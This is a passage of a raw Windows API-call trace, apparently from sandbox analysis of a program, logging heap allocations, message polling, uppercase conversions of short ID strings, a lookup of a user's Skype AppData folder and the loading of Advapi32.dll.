| out: hHeap=0x2af0000) returned 1 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0150.194] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0150.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0150.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0150.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0150.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0150.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0150.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0150.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0150.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.195] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0150.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0150.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0150.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0150.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.197] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0150.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0150.197] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0150.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0150.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0150.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0150.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0150.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.198] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Skype", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 0x9e1db8 [0150.198] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0150.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0150.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0150.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.200] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.200] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0150.200] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.200] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.202] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.202] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: 